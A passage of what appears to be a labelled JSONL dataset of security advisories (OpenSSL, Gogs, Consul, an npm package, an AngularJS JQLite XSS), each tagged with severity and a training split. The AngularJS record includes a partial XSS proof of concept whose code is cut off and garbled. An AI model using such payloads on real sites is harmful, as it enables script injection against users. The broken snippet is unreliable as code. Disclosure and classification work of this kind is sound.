Vulnerability.\n\nCountermeasures\nUpdate to the latest version of baserCMS\n\nCredits\nDaniele Scanu @SoterItSecurity", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-01", "split": "train"} -{"id": "81c25e6452dd2beac90a", "text": "[Unknown] X509_to_X509_REQ NULL pointer deref\n\nX509_to_X509_REQ NULL pointer deref (CVE-2015-0288)\n===================================================\n\nThe function X509_to_X509_REQ will crash with a NULL pointer dereference if the certificate key is invalid. This function is rarely used in practice.\n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m.\nOpenSSL 1.0.0 users should upgrade to 1.0.0r.\nOpenSSL 0.9.8 users should upgrade to 0.9.8zf.\n\nThis issue was discovered by Brian Carpenter and a fix developed by Stephen Henson of the OpenSSL development team.", "text_raw": "[Unknown] X509_to_X509_REQ NULL pointer deref\n\nX509_to_X509_REQ NULL pointer deref (CVE-2015-0288)\n===================================================\n\nSeverity: Low\n\nThe function X509_to_X509_REQ will crash with a NULL pointer dereference if the certificate key is invalid. This function is rarely used in practice.\n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m.\nOpenSSL 1.0.0 users should upgrade to 1.0.0r.\nOpenSSL 0.9.8 users should upgrade to 0.9.8zf.\n\nThis issue was discovered by Brian Carpenter and a fix developed by Stephen Henson of the OpenSSL development team.", "severity": "low", "severity_label": 0, "source": "hackerone", "timestamp": "2015-03-15", "split": "train"} -{"id": "d01fb6c120fa2f225942", "text": "Insecure Permissions in Gogs\n\nroutes/api/v1/api.go in Gogs 0.11.86 lacks permission checks for routes: deploy keys, collaborators, and hooks.", "text_raw": "Insecure Permissions in Gogs\n\n[Severity: CRITICAL]\n\nroutes/api/v1/api.go in Gogs 0.11.86 lacks permission checks for routes: deploy keys, collaborators, and hooks.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "2f89454d1779d34025df", "text": "Downloads Resources over HTTP in openframe-glslviewer\n\nAffected versions of `openframe-glslviewer` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `openframe-glslviewer`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability, and the package hasn't been updated since 2014.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in openframe-glslviewer\n\n[Severity: HIGH]\n\nAffected versions of `openframe-glslviewer` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `openframe-glslviewer`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability, and the package hasn't been updated since 2014.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "71978cb10a71969013a5", "text": "Improper Input Validation in HashiCorp Consul\n\nHashiCorp Consul and Consul Enterprise did not appropriately enforce scope for local tokens issued by a primary data center, where replication to a secondary data center was not enabled. Introduced in 1.4.0, fixed in 1.6.6 and 1.7.4.\n### Specific Go Packages Affected\ngithub.com/hashicorp/consul/agent", "text_raw": "Improper Input Validation in HashiCorp Consul\n\n[Severity: MEDIUM]\n\nHashiCorp Consul and Consul Enterprise did not appropriately enforce scope for local tokens issued by a primary data center, where replication to a secondary data center was not enabled. Introduced in 1.4.0, fixed in 1.6.6 and 1.7.4.\n### Specific Go Packages Affected\ngithub.com/hashicorp/consul/agent", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "fee9bab7cdf3695dfb7c", "text": "XSS via JQLite DOM manipulation functions in AngularJS\n\n### Summary\nXSS may be triggered in AngularJS applications that sanitize user-controlled HTML snippets before passing them to `JQLite` methods like `JQLite.prepend`, `JQLite.after`, `JQLite.append`, `JQLite.replaceWith`, `JQLite.append`, `new JQLite` and `angular.element`.\n\n### Description\n\nJQLite (DOM manipulation library that's part of AngularJS) manipulates input HTML before inserting it to the DOM in `jqLiteBuildFragment`.\n\nOne of the modifications performed [expands an XHTML self-closing tag](https://github.com/angular/angular.js/blob/418355f1cf9a9a9827ae81d257966e6acfb5623a/src/jqLite.js#L218).\n\nIf `jqLiteBuildFragment` is called (e.g. via `new JQLite(aString)`) with user-controlled HTML string that was sanitized (e.g. with [DOMPurify](https://github.com/cure53/DOMPurify)), the transformation done by JQLite may modify some forms of an inert, sanitized payload into a payload containing JavaScript - and trigger an XSS when the payload is inserted into DOM.\n\nThis is similar to a bug in jQuery `htmlPrefilter` function that was [fixed in 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/).\n\n### Proof of concept\n\n```javascript\nconst inertPayload = `
` before adding it to the DOM, closing the style element early and reactivating `img`.\n\n### Patches\nThe issue is patched in `JQLite` bundled with angular 1.8.0. AngularJS users using JQuery should upgrade JQuery to 3.5.0, as a similar vulnerability [affects jQuery <3.5.0](https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2).\n\n### Workarounds\nChanging sanitizer configuration not to allow certain tag grouping (e.g. `